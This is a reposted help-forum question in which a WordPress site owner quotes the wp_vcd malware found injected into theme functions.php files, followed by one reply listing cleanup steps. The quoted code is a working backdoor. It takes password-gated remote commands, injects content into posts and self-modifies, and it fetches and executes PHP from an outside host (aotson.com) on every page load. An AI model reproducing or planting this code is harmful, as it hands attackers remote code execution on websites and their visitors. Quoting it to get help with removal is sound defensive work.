All WordPress site hacked on my server code injection [duplicate]

This question already has an answer here:

I’ve been searching this for too long but didn’t find any solution regarding this issue. Today I am seeing the below code in all my wordpress sites hosting on the same server its injecting in themes functions.php files.

Please help! how to remove this?

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'db390680f4bc0d087d6824781eabbdaa'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';
                            if (preg_match('!<div id="'.$div_code_name.'">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }
                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "rn";
                        }
                break;
                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
                            $post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="'.$div_code_name.'">' . stripcslashes($_REQUEST['data']) . '</div>';
                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;
                                case 'change_div';
                    if (isset($_REQUEST['newdiv']))
                        {
                            if (!empty($_REQUEST['newdiv']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/$div_code_name="(.*)";/i',$file,$matcholddiv))
                                                                                                             {
                                                                                                   echo $matcholddiv[1][0];
                                                                                       $file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }
                                                                            }
                                }
                        }
                break;
                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {
                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain))
                                                                                                             {
                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }
                                                                            }
                                }
                        }
                break;
                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;
                default: print "ERROR_WP_ACTION WP_V_CD";
            }
        die("");
    }
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }
        exit;
    }
if ( ! function_exists( 'wp_temp_setup' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))
{
function wp_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?phpn" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}
extract(wp_temp_setup($tmpcontent));
}
}
?>

Read more here: All WordPress site hacked on my server code injection [duplicate]

1 thought on “All WordPress site hacked on my server code injection [duplicate]

  1. What I did to slove problem
    1. In wp-include directory, delete wp-vcd.php and class.wp.php files
    2. In wp-include directory, open post.php and detele first php tag added by Malware.
    3. Open to theme’s functions.php file, and delete the above codes.

Leave a Reply

Your email address will not be published. Required fields are marked *